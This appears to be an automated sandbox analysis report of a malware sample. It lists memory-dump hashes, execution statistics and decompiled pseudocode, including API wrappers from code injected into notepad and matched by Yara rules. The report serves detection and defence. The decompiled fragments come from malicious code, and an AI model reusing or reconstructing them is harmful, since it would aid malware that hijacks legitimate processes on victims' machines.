                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4e40000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bb1e2e1c6a5ab4d1dc156458d7aa3c16e6c4607c3482a5fe6730e6272f3a3b6a
                                                    • Instruction ID: 2f9305906b056f1e3801efe8057ca56e1cf343db9b51734e4b88a4ab6749b3c2
                                                    • Opcode Fuzzy Hash: bb1e2e1c6a5ab4d1dc156458d7aa3c16e6c4607c3482a5fe6730e6272f3a3b6a
                                                    • Instruction Fuzzy Hash: 3CE08C34B042048FCB49DF20E454668BBA1AB86244B0464E9C85A9F340EB32BE42CF81
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.955901333.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4e40000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 662e7b668064c116c976844891c255c637455c6ef838177a05dbbea1af253952
                                                    • Instruction ID: 62a5bb3750a14e61446f65a1d45e0992105d60328efb47c9e88fdf6af87a98ae
                                                    • Opcode Fuzzy Hash: 662e7b668064c116c976844891c255c637455c6ef838177a05dbbea1af253952
                                                    • Instruction Fuzzy Hash: 84E0EC34A042009FCB49DF60D894968B7B2FB89304B149498D84D9B364DB31AD82DF41
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.946986991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_b50000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 'aO$65N
                                                    • API String ID: 0-3547228216
                                                    • Opcode ID: 5710d5d353ccb79c86de0d48264d51a66048c6d926037e5baf20b2f7e49d06e1
                                                    • Instruction ID: a6db7babeaa726f95e6499b24e4822e42debb724d810b858971b8034b63128a7
                                                    • Opcode Fuzzy Hash: 5710d5d353ccb79c86de0d48264d51a66048c6d926037e5baf20b2f7e49d06e1
                                                    • Instruction Fuzzy Hash: 8B61E431A04105CFC70CDBB4C6906ADBBE6ABCA314B9555EAD902FF394DB306D08AB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.946986991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_b50000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: wUZH
                                                    • API String ID: 0-2240337694
                                                    • Opcode ID: 05c54b3d514c5254bdb1ba28692c35018abb4c7f383275c4f7a82535da1338bd
                                                    • Instruction ID: fcfa56d58e75ac82950efb9baf793a5d4f75d7030a11bc084d6a694a0d6440ec
                                                    • Opcode Fuzzy Hash: 05c54b3d514c5254bdb1ba28692c35018abb4c7f383275c4f7a82535da1338bd
                                                    • Instruction Fuzzy Hash: 21D19071A042188FCB18DF34DAA06AD7BF6AB99204F6544EAC50AEB754EF309E458F41
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.945566333.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1f0000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 74d1d71b5818b8e1505d822d6f1c3d3e8d7ecbe7f1aa30ef9cf14eab2d71f322
                                                    • Instruction ID: 9dd4b9ac0f82ddbab2e24aa810190a1a94ff6b741ca4c3b00ba8df3532ae2cda
                                                    • Opcode Fuzzy Hash: 74d1d71b5818b8e1505d822d6f1c3d3e8d7ecbe7f1aa30ef9cf14eab2d71f322
                                                    • Instruction Fuzzy Hash: 10C10675A04259CFCB05CFA5C8908EEBBF3FF89300B1585AAE5499B261D734ED91CB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.946986991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_b50000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9e41eadd5a7daeff47c37b715892a49c4c4632bf3e95e0aa348d7628f20c0f22
                                                    • Instruction ID: b33db6c752c679b32603b3880bb7e4bd1b2c324dbd0d80aacabfee5afef4f10f
                                                    • Opcode Fuzzy Hash: 9e41eadd5a7daeff47c37b715892a49c4c4632bf3e95e0aa348d7628f20c0f22
                                                    • Instruction Fuzzy Hash: 9441A331B08259CFD70CDF34CA8166ABBE6ABC670075595AAC502AF358DE309D099B91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.946986991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_b50000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6469036fbe9e4c07e274b149272709f4b3faf6b0a462ea24e9d85ae5ae2cae4b
                                                    • Instruction ID: ca34de4e1997d9f13536a240d8fa0cf84b5d3f4eb95109660c01e4afe402a1a9
                                                    • Opcode Fuzzy Hash: 6469036fbe9e4c07e274b149272709f4b3faf6b0a462ea24e9d85ae5ae2cae4b
                                                    • Instruction Fuzzy Hash: 33412631E041058FC718DFB1D9904AEBBF7BBC921076585AAC902FB398EF30AD058B91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.946986991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_b50000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: da3e7f344a1ee7171c55aea03056b1942e05a55f5c76131c028fdacba297a429
                                                    • Instruction ID: 8877f2ba93d21ffe201e75a494be5b427eab523a123fd6f3ab65f2a2b85c63cd
                                                    • Opcode Fuzzy Hash: da3e7f344a1ee7171c55aea03056b1942e05a55f5c76131c028fdacba297a429
                                                    • Instruction Fuzzy Hash: 0A31D235708085CBC30CDB78D9C066A7FA7A7C63417A5D5A9C6079F39CDE70AD0A8BA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.946986991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_b50000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d92e2d8cfef8b7b2af1a77afa09c2977b78062515cdd301eac96965f67be81a4
                                                    • Instruction ID: 50cffac9a0d938cd8925e2ee3152c865f82d4a87131cc27c65afa3b220be72d5
                                                    • Opcode Fuzzy Hash: d92e2d8cfef8b7b2af1a77afa09c2977b78062515cdd301eac96965f67be81a4
                                                    • Instruction Fuzzy Hash: 4E31C471B18119CBC3089F75DA8062A7FA7B7C6300BA595ADC6439F39CDF30AD0A8791
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 74%
                                                    			E01188E9C() {
                                                    				signed int _t59;
                                                    				signed char _t60;
                                                    				signed short _t62;
                                                    				signed int _t63;
                                                    				signed int _t64;
                                                    				signed char _t65;
                                                    				signed int _t66;
                                                    				signed int _t67;
                                                    				signed int _t69;
                                                    				signed int _t70;
                                                    				signed char _t71;
                                                    				signed short _t72;
                                                    				signed int _t73;
                                                    				signed int _t74;
                                                    				signed int _t75;
                                                    				signed int _t76;
                                                    				signed int _t80;
                                                    				signed char _t81;
                                                    				signed int _t83;
                                                    				signed int _t84;
                                                    				intOrPtr* _t86;
                                                    				intOrPtr* _t87;
                                                    				signed int _t90;
                                                    				signed int _t94;
                                                    				signed char _t104;
                                                    				signed char _t105;
                                                    				signed char _t106;
                                                    				signed int _t107;
                                                    				signed char _t108;
                                                    				signed char _t112;
                                                    				signed char _t113;
                                                    				signed char _t114;
                                                    				signed char _t117;
                                                    				signed char _t120;
                                                    				signed char _t122;
                                                    				signed char _t124;
                                                    				signed char _t128;
                                                    				signed char _t131;
                                                    				signed char _t133;
                                                    				signed char _t135;
                                                    				signed char _t136;
                                                    				signed char _t137;
                                                    				signed char _t138;
                                                    				signed char _t139;
                                                    				signed char _t142;
                                                    				signed int _t143;
                                                    				signed char* _t144;
                                                    				signed int _t145;
                                                    				signed int _t146;
                                                    				void* _t149;
                                                    				void* _t150;
                                                    				void* _t151;
                                                    				signed int _t152;
                                                    				void* _t156;
                                                    
                                                    				_push(ss);
                                                    				 *_t59 =  *_t59 + _t59;
                                                    				_t113 = _t112 |  *_t135;
                                                    				 *_t59 =  *_t59 + _t59;
                                                    				 *_t104 =  *_t104 + _t135;
                                                    				 *_t113 =  *_t113 ^ _t113;
                                                    				 *_t135 =  *_t135 + _t104;
                                                    				 *_t59 =  *_t59 + _t59;
                                                    				_t60 = _t59 | 0x7e110000;
                                                    				asm("adc eax, 0x280a0000");
                                                    				_push(cs);
                                                    				 *_t60 =  *_t60 + _t60;
                                                    				_t114 = _t113 |  *_t135;
                                                    				_t136 = _t135 & _t60;
                                                    				 *_t144 =  *_t144 << 0xba;
                                                    				 *(_t149 + 0x20e341df) =  *(_t149 + 0x20e341df) & _t136;
                                                    				_push(_t136);
                                                    				 *(_t60 | 0x00000008) = _t104;
                                                    				asm("cmpsd");
                                                    				_pop(_t137);
                                                    				_pop(_t62);
                                                    				_t63 = _t62 & 0x0000190b;
                                                    				if(_t63 > 0) {
                                                    					 *_t63 =  *_t63 + _t63;
                                                    					_t114 = _t114 | _t144[0xc28] |  *_t63;
                                                    					_t63 = _t63 | 0x580a0000;
                                                    				}
                                                    				 *_t63 =  *_t63 + _t63;
                                                    				_t105 = _t104 |  *(_t63 + 0x5e);
                                                    				_t150 = _t149 + 1;
                                                    				_t64 = _t63 +  *_t63;
                                                    				 *_t64 =  *_t64 + _t64;
                                                    				_t143 = 0x27ffffff;
                                                    				 *_t64 =  *_t64 + _t64;
                                                    				 *_t137 =  *_t137 + _t64;
                                                    				 *_t64 =  *_t64 + _t64;
                                                    				 *_t105 =  *_t105 + _t114;
                                                    				_t65 = _t64 & 0x003fbc72;
                                                    				if(_t65 >= 0) {
                                                    					 *_t65 =  *_t65 + _t65;
                                                    					_t114 = _t114 |  *_t65;
                                                    					 *_t137 =  *_t137 + _t114;
                                                    					asm("int 0x28");
                                                    					asm("sldt word [eax]");
                                                    					_t137 = _t137 |  *_t105;
                                                    					es = cs;
                                                    					 *(_t137 + 0x11) =  *(_t137 + 0x11) | _t105;
                                                    					_t105 = _t105 -  *((intOrPtr*)(_t150 + 0x176f02));
                                                    					 *_t137 =  *_t137 + _t114;
                                                    					_t65 = (_t65 |  *_t65 | 0x7c271620) + 0x61 -  *((intOrPtr*)((_t65 |  *_t65 | 0x7c271620) + 0x61));
                                                    					 *_t105 =  *_t105 + _t137;
                                                    				}
                                                    				asm("adc esi, [eax]");
                                                    				_t66 = _t65 |  *_t65;
                                                    				asm("outsd");
                                                    				 *_t66 =  *_t66 + _t66;
                                                    				 *0x7e110000 =  *0x7e110000 + _t114;
                                                    				asm("adc eax, 0x280a0000");
                                                    				 *_t66 =  *_t66 + _t66;
                                                    				 *(_t150 + 0xcd46035) =  *(_t150 + 0xcd46035) & _t105;
                                                    				_t144[0x66] = _t144[0x66] | _t66;
                                                    				 *(_t105 + 0x58a73c40) =  *(_t105 + 0x58a73c40) & _t105;
                                                    				_t67 = _t66 & 0x0b7e190b;
                                                    				 *_t67 =  *_t67 + _t67;
                                                    				_t117 = _t114 |  *_t137 | _t144[0xc28] |  *_t67;
                                                    				_t145 = cs;
                                                    				_t151 = _t150 + 1;
                                                    				_t69 = (_t67 | 0x580a0000) +  *(_t67 | 0x580a0000);
                                                    				 *_t69 =  *_t69 + _t69;
                                                    				asm("retf");
                                                    				asm("invalid");
                                                    				 *_t137 =  *_t137 + 1;
                                                    				 *_t69 =  *_t69 + _t69;
                                                    				 *_t143 =  *_t143 + _t69;
                                                    				 *_t69 =  *_t69 + _t69;
                                                    				 *_t105 =  *_t105 + _t117;
                                                    				_t70 = _t69 & 0x003fcc72;
                                                    				if(_t70 >= 0) {
                                                    					 *_t70 =  *_t70 + _t70;
                                                    					_t133 = _t117 |  *_t70;
                                                    					 *_t137 =  *_t137 + _t133;
                                                    					asm("fisubr word [eax]");
                                                    					asm("sldt word [eax]");
                                                    					_t137 = _t137 |  *_t105;
                                                    					es = cs;
                                                    					 *(_t137 + 0x11) =  *(_t137 + 0x11) | _t105;
                                                    					_t70 = (_t70 |  *_t70 | 0x504dfc20) + 0x61;
                                                    					_t151 = _t151 -  *((intOrPtr*)(_t133 + 0x186f0302));
                                                    					 *_t70 =  *_t70 + _t70;
                                                    					_t117 = _t133 |  *_t137;
                                                    					 *_t105 =  *_t105 + _t137;
                                                    				}
                                                    				asm("adc esi, [eax]");
                                                    				 *_t70 =  *_t70 | _t70;
                                                    				 *_t70 = _t70;
                                                    				 *_t70 =  *_t70 + _t70;
                                                    				_t71 = _t70 | 0x7e110000;
                                                    				asm("adc eax, 0x280a0000");
                                                    				_push(cs);
                                                    				 *_t71 =  *_t71 + _t71;
                                                    				_t138 = _t137;
                                                    				 *0x80c6544 = _t71;
                                                    				 *_t143 =  *_t143 & _t71;
                                                    				_t72 = _t71 | 0x00000025;
                                                    				_t106 = _t105 |  *(_t138 + 0x66);
                                                    				 *0x2098be2e =  *0x2098be2e & _t138;
                                                    				asm("adc [ebp-0x38], bl");
                                                    				asm("out dx, eax");
                                                    				 *((intOrPtr*)(_t151 + _t138 + 0x58595966)) =  *((intOrPtr*)(_t151 + _t138 + 0x58595966)) - _t145;
                                                    				_t120 = (_t117 |  *_t137) & _t72 & _t106;
                                                    				_t146 = _t145 &  *(_t145 + 0x596666bd);
                                                    				_t73 = _t72 & 0x0000190b;
                                                    				if(_t73 > 0) {
                                                    					 *_t73 =  *_t73 + _t73;
                                                    					_t120 = _t120 |  *(_t146 + 0xc28) |  *_t73;
                                                    					_t73 = _t73 | 0x580a0000;
                                                    				}
                                                    				 *_t73 =  *_t73 + _t73;
                                                    				_t107 = _t106 |  *(_t73 + 0x5e);
                                                    				_t152 = _t151 + 1;
                                                    				_t74 = _t73 +  *_t73;
                                                    				 *_t74 =  *_t74 + _t74;
                                                    				asm("daa");
                                                    				 *_t74 =  *_t74 + _t74;
                                                    				 *_t138 =  *_t138 + _t74;
                                                    				 *_t74 =  *_t74 + _t74;
                                                    				 *((intOrPtr*)(_t74 + 0x2bffffff)) =  *((intOrPtr*)(_t74 + 0x2bffffff)) + _t138;
                                                    				_t75 = _t74 & 0x003fdc72;
                                                    				if(_t75 >= 0) {
                                                    					 *_t75 =  *_t75 + _t75;
                                                    					_t131 = _t120 |  *_t75;
                                                    					 *_t138 =  *_t138 + _t131;
                                                    					_t94 = _t75 |  *_t75 | 0xcd818b20;
                                                    					 *_t94 =  *_t94 - _t152;
                                                    					asm("sldt word [eax]");
                                                    					_t138 = _t138 |  *_t107;
                                                    					es = cs;
                                                    					 *(_t138 + 0x11) =  *(_t138 + 0x11) | _t107;
                                                    					_t120 = _t131 -  *((intOrPtr*)(_t146 + 0x196f02));
                                                    					 *_t138 =  *_t138 + _t120;
                                                    					_t75 = _t94 + 0x61 -  *((intOrPtr*)(_t94 + 0x61));
                                                    					 *_t75 =  *_t75 + _t75;
                                                    				}
                                                    				 *_t107 =  *_t107 + _t138;
                                                    				 *_t120 =  *_t120 ^ _t120;
                                                    				 *((intOrPtr*)(_t75 + _t75 + 0xd0000)) =  *((intOrPtr*)(_t75 + _t75 + 0xd0000)) + _t75;
                                                    				 *_t120 =  *_t120 + _t138;
                                                    				if( *_t120 > 0) {
                                                    					 *_t75 =  *_t75 + _t75;
                                                    					_push(cs);
                                                    					 *_t75 =  *_t75 + _t75;
                                                    					_t138 = _t138 & _t107;
                                                    					_t120 = 0x80c1b6e;
                                                    					 *[gs:ebp+0x7f] =  *[gs:ebp+0x7f] & _t138;
                                                    					_t143 = _t143 + 1;
                                                    				}
                                                    				asm("aas");
                                                    				 *(0x20665844 + _t152 * 8) =  *(0x20665844 + _t152 * 8) & _t75;
                                                    				asm("stosd");
                                                    				asm("fnstcw word [esi]");
                                                    				 *(_t152 + 0x65) =  *(_t152 + 0x65) & 0x66595a61;
                                                    				asm("o16 and [gs:ebp+0x6134ff22], ch");
                                                    				_t76 = _t75 & 0x0b7e190b;
                                                    				 *_t76 =  *_t76 + _t76;
                                                    				_t122 = _t120 |  *(_t146 + 0xc28) |  *_t76;
                                                    				 *((intOrPtr*)((_t76 | 0x580a0000) +  *(_t76 | 0x580a0000))) =  *((intOrPtr*)((_t76 | 0x580a0000) +  *(_t76 | 0x580a0000))) + (_t76 | 0x580a0000) +  *(_t76 | 0x580a0000);
                                                    				asm("invalid");
                                                    				_t80 = 0xff +  *0xff;
                                                    				 *_t80 =  *_t80 + _t80;
                                                    				asm("daa");
                                                    				 *_t80 =  *_t80 + _t80;
                                                    				 *_t107 =  *_t107 + _t122;
                                                    				_t81 = _t80 & 0x003fec72;
                                                    				if(_t81 >= 0) {
                                                    					 *_t81 =  *_t81 + _t81;
                                                    					_t128 = _t122 |  *_t81;
                                                    					 *_t138 =  *_t138 + _t128;
                                                    					_t90 = _t81 |  *_t81 | 0x9213b220;
                                                    					asm("lodsd");
                                                    					 *_t143 =  *_t143 - _t128;
                                                    					 *_t90 =  *_t90 + _t90;
                                                    					_t142 = _t138 |  *_t107;
                                                    					es = cs;
                                                    					 *(_t142 + 0x11) =  *(_t142 + 0x11) | _t107;
                                                    					_t138 = _t142 -  *((intOrPtr*)(_t142 + 0x1a28));
                                                    					_t122 = _t128 |  *_t138;
                                                    					asm("adc esi, [eax]");
                                                    					_t81 = _t90 + 0x61 |  *(_t90 + 0x61);
                                                    				}
                                                    				 *((intOrPtr*)(_t143 + 0xd000000)) =  *((intOrPtr*)(_t143 + 0xd000000)) + _t107;
                                                    				 *_t81 =  *_t81 + _t81;
                                                    				asm("adc [esi+0x15], edi");
                                                    				 *_t81 =  *_t81 + _t81;
                                                    				 *_t81 =  *_t81 + _t81;
                                                    				_t124 = _t122 |  *_t81 |  *_t138;
                                                    				 *(_t107 - 0x7e) =  *(_t107 - 0x7e) & _t107;
                                                    				 *(_t124 + 9) =  *(_t124 + 9) & _t138;
                                                    				_t108 = _t107 & _t143;
                                                    				_t139 = cs;
                                                    				 *_t139 =  *_t139 & _t124;
                                                    				asm("daa");
                                                    				_t83 = _t156 + 1;
                                                    				asm("invalid");
                                                    				asm("popad");
                                                    				 *_t108 =  *_t108 & _t139;
                                                    				asm("adc dword [ebx+eax+0x20], 0x266537bb");
                                                    				 *(_t83 + 0x5a61d493 + _t124 * 2) =  *(_t83 + 0x5a61d493 + _t124 * 2) & _t83;
                                                    				asm("invalid");
                                                    				 *(_t108 & _t124) =  *(_t108 & _t124) & _t108 & _t124;
                                                    				asm("int 0x83");
                                                    				asm("popa");
                                                    				asm("popad");
                                                    				asm("stosd");
                                                    				_push(ds);
                                                    				_t84 = _t83 & 0x0b7e190b;
                                                    				 *_t84 =  *_t84 + _t84;
                                                    				_t86 = (_t84 | 0x580a0000) +  *(_t84 | 0x580a0000);
                                                    				 *_t86 =  *_t86 + _t86;
                                                    				_t87 = _t86 -  *_t86;
                                                    				 *_t87 =  *_t87 + _t87;
                                                    				 *((intOrPtr*)(_t87 +  *_t87)) =  *((intOrPtr*)(_t87 +  *_t87)) + _t87 +  *_t87;
                                                    				asm("sahf");
                                                    				asm("invalid");
                                                    				goto [far dword [ebx];
                                                    			}
                                                    0x0118908a
                                                    0x01189095
                                                    0x01189099
                                                    0x0118909b
                                                    0x0118909d
                                                    0x0118909f
                                                    0x011890a0
                                                    0x011890a2
                                                    0x011890a4
                                                    0x011890a9
                                                    0x011890ac
                                                    0x011890ae
                                                    0x011890b2
                                                    0x011890b4
                                                    0x011890b9
                                                    0x011890ba
                                                    0x011890bc
                                                    0x011890be
                                                    0x011890c2
                                                    0x011890c3
                                                    0x011890c8
                                                    0x011890ce
                                                    0x011890d0
                                                    0x011890d2
                                                    0x011890d2
                                                    0x011890d3
                                                    0x011890d9
                                                    0x011890db
                                                    0x011890de
                                                    0x011890e3
                                                    0x011890e5
                                                    0x011890e7
                                                    0x011890ee
                                                    0x011890f1
                                                    0x011890f3
                                                    0x011890f4
                                                    0x011890f6
                                                    0x011890f7
                                                    0x011890f8
                                                    0x011890fa
                                                    0x011890fc
                                                    0x011890fe
                                                    0x01189106
                                                    0x0118910f
                                                    0x01189112
                                                    0x01189115
                                                    0x01189118
                                                    0x0118911a
                                                    0x0118911e
                                                    0x0118911f
                                                    0x01189121
                                                    0x01189128
                                                    0x01189139
                                                    0x0118913b
                                                    0x0118913d
                                                    0x0118913f
                                                    0x01189143
                                                    0x01189145
                                                    0x01189146
                                                    0x01189148

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.947213115.0000000001182000.00000040.00000001.01000000.00000003.sdmp, Offset: 01180000, based on PE: true
                                                    • Associated: 00000005.00000002.947177352.0000000001180000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1180000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 64f32b6298d729965e2405e47c9b48dfe997b72bf8d34ae13eff21ac79e28433
                                                    • Instruction ID: c5e8a614f1964f8dfd8567fdfd36a88fc49827c7acc79a3c128513d63c569f8b
                                                    • Opcode Fuzzy Hash: 64f32b6298d729965e2405e47c9b48dfe997b72bf8d34ae13eff21ac79e28433
                                                    • Instruction Fuzzy Hash: 7731176641EBD18FC7039B744CB26D27FB25E17220B2E49CBC4C18F4A3C614A659D326
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Execution Graph

                                                    Execution Coverage:2.3%
                                                    Dynamic/Decrypted Code Coverage:2.2%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:639
                                                    Total number of Limit Nodes:81

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 41adf0-41ae39 call 41b9b0 NtReadFile
                                                    C-Code - Quality: 37%
                                                    			E0041ADF0(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                    				void* _t18;
                                                    				intOrPtr* _t27;
                                                    
                                                    				_t13 = _a4;
                                                    				_t27 = _a4 + 0xc6c;
                                                    				E0041B9B0( *((intOrPtr*)(_t13 + 0x14)), _t13, _t27,  *((intOrPtr*)(_t13 + 0x14)), 0, 0x2a);
                                                    				_t6 =  &_a32; // 0x415fe0
                                                    				_t12 =  &_a8; // 0x415fe0
                                                    				_t18 =  *((intOrPtr*)( *_t27))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
                                                    				return _t18;
                                                    			}


                                                    APIs
                                                    • NtReadFile.NTDLL(_A,004112B8,FFFFFFFF,00415ACA,?,?,_A,?,00415ACA,FFFFFFFF,004112B8,00415FE0,?,00000000), ref: 0041AE35
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID: _A$_A
                                                    • API String ID: 2738559852-4113603176
                                                    • Opcode ID: 8b2641afd4992059007ae0332a24cf2034ac5fc3712eec955c9c09407593ca19
                                                    • Instruction ID: 9b73d0bb524ae2008c0040566ba0b2cc5ee1c7afffee4fb23630f66280de0acd
                                                    • Opcode Fuzzy Hash: 8b2641afd4992059007ae0332a24cf2034ac5fc3712eec955c9c09407593ca19
                                                    • Instruction Fuzzy Hash: 3FF0A4B2210108ABCB14DF89DC85EEB77ADEF8C754F118249BA4D97241D630E811CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph (legend: Executed / Not Executed)
                                                    • Block 265: 41ad3a-41ad56
                                                    • Block 266: 41ad5c-41ad91 NtCreateFile
                                                    • Block 267: 41ad57 call 41b9b0
                                                    • Edges: 265->266, 265->267, 267->266
                                                    C-Code - Quality: 79%
                                                    			E0041AD3A(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                    				long _t22;
                                                    
                                                    				asm("adc dl, [ebp-0x75]");
                                                    				_t16 = _a4;
                                                    				_t3 = _t16 + 0xc64; // 0xc64
                                                    				E0041B9B0( *((intOrPtr*)(_a4 + 0x14)), _t16, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
                                                    				_t22 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                    				return _t22;
                                                    			}





                                                    APIs
                                                    • NtCreateFile.NTDLL(00000060,00409C63,?,00415E1C,00409C63,FFFFFFFF,?,?,FFFFFFFF,00409C63,00415E1C,?,00409C63,00000060,00000000,00000000), ref: 0041AD8D
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: a84c44586c6b92055e6199a7c268357859d7d6940ef359063de5626f1e28ee88
                                                    • Instruction ID: 7f79384ac8252130d8a4ccf3353a55d2ab66ad2f0bb608739f4b145add724747
                                                    • Opcode Fuzzy Hash: a84c44586c6b92055e6199a7c268357859d7d6940ef359063de5626f1e28ee88
                                                    • Instruction Fuzzy Hash: EA01B6B2211108AFCB58CF99DD95DDB37A9EF8C354F158248FA4DE7241C634E851CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph (legend: Executed / Not Executed)
                                                    • Block 268: 41ad40-41ad91 call 41b9b0 NtCreateFile (single block, no edges)
                                                    C-Code - Quality: 100%
                                                    			E0041AD40(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                    				long _t21;
                                                    
                                                    				_t3 = _a4 + 0xc64; // 0xc64
                                                    				E0041B9B0( *((intOrPtr*)(_a4 + 0x14)), _t15, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
                                                    				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                    				return _t21;
                                                    			}





                                                    APIs
                                                    • NtCreateFile.NTDLL(00000060,00409C63,?,00415E1C,00409C63,FFFFFFFF,?,?,FFFFFFFF,00409C63,00415E1C,?,00409C63,00000060,00000000,00000000), ref: 0041AD8D
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: a7aa8badec4095c914b2940b07876bf3970e40effb07566943172ffd39e61dea
                                                    • Instruction ID: 266fac26e5f6b77c20c7c3866c70db339a011befb51e61fde83e4fde5762e25e
                                                    • Opcode Fuzzy Hash: a7aa8badec4095c914b2940b07876bf3970e40effb07566943172ffd39e61dea
                                                    • Instruction Fuzzy Hash: D5F0B2B2210208ABCB08CF89DC85EDB37ADAF8C754F018208BA0997241C630E851CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph (legend: Executed / Not Executed)
                                                    • Block 277: 41af1a-41af5d call 41b9b0 NtAllocateVirtualMemory (single block, no edges)
                                                    C-Code - Quality: 68%
                                                    			E0041AF1A(void* __ebx, void* __ecx, void* __edi, void* _a4, PVOID* _a8, long _a12, long* _a16, long _a20, long _a24) {
                                                    				intOrPtr _v0;
                                                    				long _t16;
                                                    
                                                    				asm("stosd");
                                                    				asm("sahf");
                                                    				 *((intOrPtr*)(__edi - 0x1374aa8d)) =  *((intOrPtr*)(__edi - 0x1374aa8d)) + __ecx;
